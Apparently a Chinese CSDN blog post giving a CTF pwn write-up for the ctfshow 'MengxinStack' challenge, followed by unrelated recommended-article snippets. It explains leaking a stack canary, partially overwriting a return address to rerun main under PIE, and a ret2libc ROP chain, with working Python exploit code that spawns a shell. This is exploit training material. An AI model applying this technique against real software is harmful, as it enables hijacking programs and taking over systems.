开启pie保护利用之重启main函数

最新推荐文章于 2024-10-02 14:03:05 发布
最新推荐文章于 2024-10-02 14:03:05 发布
阅读量303 收藏 5
点赞数 3
文章标签: linux 前端 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880074/article/details/142265491
版权

题目:ctfshow36D杯:MengxinStack

审计代码

程序开启了pie,canary,利用第一个格式化泄露出canary,但是此时我们只剩下一次读入的机会,还没有得到libc基址、pie基址,该怎么办呢。

pie保护我们只能确定main函数后三位地址,所以常规方法改返回地址为main函数是行不通的,这时候就需要用到magic_gadget了,我们通过ida查看libc链接文件中libc_start_main的汇编会发现一个magic_gadget。

mov     rax, [rsp+98h+var_90];call    rax;

将rsp+98h+var_90里的值赋给rax,然后返回rax,我们进入gdb调试看一下

rl("She said: hello?")
pay=b'a'*0x29
s(pay)
rl(b'a'*0x28)
canary=u64(p.recv(16),16)-0x61
li(hex(canary))
pay1=b'a'*0x28+p64(canary)*4+b'\x89'
bug()
s(pay1)

 修改返回地址的尾字节发现我们将main函数的栈地址赋给了rax,那么call rax就行再次返回main函数,此时我们又多了两次read的机会,打ret2libc就可以

利用第一次的%s泄露出返回地址并计算出libc基址,构造rop链,getshell。

rl("She said: hello?")
pay=b'a'*0x29
s(pay)
rl(b'a'*0x28)
canary=u64(p.recv(16),16)-0x61
li(hex(canary))
pay1=b'a'*0x28+p64(canary)*4+b'\x89'
#bug()
s(pay1)
pay2=b'a'*0x48
s(pay2)
libc_base=get_addr64()-libc.sym['__libc_start_main']+48
li(hex(libc_base))
#bug()
system,bin=get_sb()
rdi=0x000000000002a3e5+libc_base
pay3=b'a'*0x28+p64(canary)*4+p64(rdi)+p64(bin)+p64(rdi+1)+p64(system)
s(pay3)

笙南!
关注
Windows.h 常用API函数【转】
李子果 - 博客
08-12 133万+
转自:https://blog.csdn.net/farmwang/article/details/50603608 http://www.vbgood.com/api.html http://hi.baidu.com/3582077/item/9cc3483b581f53c5392ffae3 第一个:FindWindow根据窗口类名或窗口标题名来获得窗口的句柄,该函数返回窗口的句柄, 这...
PWN入门系列(3)ROP的利用
小心信科理化声
12-04 2304
ret2shellcode 原理 ret2shellcode,即控制程序shellcode代码。shellcode指的是用于完成某个功能的汇编代码,如:call等,常见的功能主要是获取目标系统的shell。如果想执行shellcode,需要对应的binary在运行时,shellcode所在的区域具有可执行权限。 举例 还是以bammboofox的ret2shellcode为例 附:ret2shellcode 第一步还是进行checksec giantbranch@ubuntu:~/Desktop/PWN$
Android9.0(Pie) system_server进程学习
菜鸟博客
11-25 1335
​ 在上篇文章《Zygote——Android系统中java世界的受精卵》中,我们提到了zygote的一个关键动作,那就是fork出system_server进程。这篇文章我们就来详细分析一下system_server的启动流程,以及都做了哪些事吧。
pwn入门笔记(1)——保护概述和溢出实例
weixin_45551695的博客
07-25 454
保护和溢出 常见的保护 CANNARY(栈保护) 当启用栈保护的时候,函数会往栈里面插入cookie信息,当函数返回的时候会验证coookie信息是否合法,不合法就会中止程序运行,就是防止程序溢出 FORTIFY 同样也是防止缓冲区溢出 NX(windows平台上称为DEP) No-eXecute(不可执行),当程序溢出成功转入shellcode,程序会尝试在数据页面执行指令,此时CPU就会抛出异常,而不是去执行恶意指令 PIE(ASLR) ASLR:地址空间分布随机化 每次电脑重启,装载同一个程序,函数
windows常用API函数
热门推荐
farmwang的专栏
01-28 2万+
windows常用API函数   http://www.vbgood.com/api.html http://hi.baidu.com/3582077/item/9cc3483b581f53c5392ffae3 第一个:FindWindow根据窗口类名或窗口标题名来获得窗口的句柄,该函数返回窗口的句柄, 这个函数的定义是这样的 HWND WINAPI FindWind
栈溢出漏洞的利用和缓解
weixin_34133829的博客
03-24 844
一直有人说这个时代做渗透太难了, 各个平台都开始重视安全性, 不像十几年前, 随便有个栈溢出就能轻松利用. 现在的环境对于新手而言确实不算友好, 上来就需要 面临着各种边界保护, 堆栈保护, 地址布局随机化. 但现实如此, 与其抱怨, 不如直面现实, 拥抱变化, 对吧? 本文所演示的环境为64位Linux+32位ELF程序. 文中所用到的代码和exp皆可在github仓库中找到. 前言 知识...
整理一下Android Pie 的init进程源码的主函数
日月
06-11 272
//init进程的三大功能:属性服务、处理子进程终止、解析与运行init.rc文件 int main(int argc, char** argv) { if (!strcmp(basename(argv[0]), "ueventd")) { return ueventd_main(argc, argv); } if (!strcmp(basename(argv[0]), "watchdogd")) { return watchdogd_main(a.
Android9.0(Pie)1号进程init的启动流程学习
菜鸟博客
10-09 1165
1、引言 众嗦粥汁,无论是电脑还是手机,亦或是其他终端设备,其从上电到完全启动都有一套复杂的流程。本来是打算使用相对简单一些的android4.4版本代码来学习这一整个流程,但是由于工作生产环境从android4.4的kitkak变为了9.0的pie,所以直接用9.0的代码来学习,学习代码和熟悉9.0环境两不误,哦耶! 拿android系统的设备来说,由于其底层是linux内核,其从开机上电后,会先后经历加载boot、启动kernel等过程。(当然这个过程...
重启_uaf_hacknote
蚁景网安学院
10-14 368
亲爱的,关注我吧10/14文章共计2219个词预计阅读8分钟来和我一起阅读吧参考链接http://blog.eonew.cn/archives/490 https://blog.csd...
OpenSSH 代码问题漏洞(CVE-2023-38408)升级到最新版
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
10-16 2963
其中,ssh-agent是一个后台程序,可缓存用于SSH公钥身份验证的私钥,通过跟踪用户的身份密钥和密码来简化用户身份验证过程。一旦这些密钥存储在ssh-agent中,它就允许用户访问其他服务器,而无需重新输入密码或密码,从而提供流畅的单点登录(SSO)体验,从而减少常规密码输入的需要。通过Openssh配置(sshd_config)、防火墙,安全组ACL等限制来源访问IP为白名单仅可信IP地址,同时,非必要,关闭SSH代理转发功能,禁止在有关主机启用ssh隧道等。,或升级到9.4p1或9.5p1版本;
桌面PC/服务器 ubuntu18.04 Linux内核编译升级与机制分析
tugouxp的专栏
06-06 5567
1.下载内核并且解压安装依赖2.执行make menuconfig,并不修改,使用默认然后退出,默认使用的配置是x86_64_defconfig还可以拷贝/boot/目录下的既有的config文件来作为编译内核的配置文件来编译。但是需要两个内核版本号差别不大,可以互通使用。将CONFIG_SYSTEM_TRUSTED_KEYS字符串置空。3.执行make -j4因为之前编译过,再次编译输出很少4.执行sudo make modules_install。
2022版u-boot启动分析笔记之一(start.S与lowlevel_init.S)
weixin_42408707的博客
01-02 806
分析2022版U-Boot的启动过程Stage1,包括start.S和lowlevel.S的分析。
可视化技术介绍之Echarts
manor的博客
12-09 1432
文章目录可视化面板介绍01-使用技术02- 案例适配方案03-基础设置04-header 布局05-mainbox 主体模块06-公共面板模块 panel07-柱形图 bar 模块(布局)08-中间布局09-Echarts-介绍10-Echarts-体验11-Echarts-基础配置12- 柱状图图表(两大步骤)13-柱状图2定制14-折线图1 人员变化模块制作15-折线图2 播放量模块制作16-饼形图 1年龄分布模块制作17-饼形图2 地区分布模块制作(南丁格尔玫瑰图)18-Echarts-社区介绍19
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1201
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
linux 网络序
CodeHouse的博客
09-30 469
在将ip字符串转网络序存储时。根据整形二进制显示判断。
[Linux]从零开始的网站搭建教程
最新发布
c858845275的博客
10-02 1268
讲解了如何搭建运维面板安装web服务器和搭建一个自己的网站。
在 Kali Linux 中安装 Impacket
weixin_44023460的博客
09-30 351
在安装 Impacket 之前,你需要确保安装了 Python 和一些必要的依赖。通常,Kali 已经预装了 Python。步骤 3:克隆 Impacket 仓库。步骤 4:进入 Impacket 目录。如果你看到帮助信息,说明安装成功。步骤 5:安装 Impacket。
Linux的基本指令(2)
shylyly_的博客
10-01 997
Linux的基本指令(2) man nano cp mv which 自制指令 alias echo cat tac > >> < more less head tail |(管道)
matlab pie函数
04-26
用法是什么? Matlab中,pie()函数用于绘制饼图。它有两种基本的调用方式。第一种是直接传递数值向量,如pie([10 20 30 40]);第二种是传递数值向量和标签向量的元胞数组,如:pie({[10 20 30 40], {'label1', 'label2', 'label3', 'label4'}})。函数pie()会根据传递的数值向量计算百分比,并绘制相应的饼图。如果传递了标签向量,函数会在饼图中标记相应的标签。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值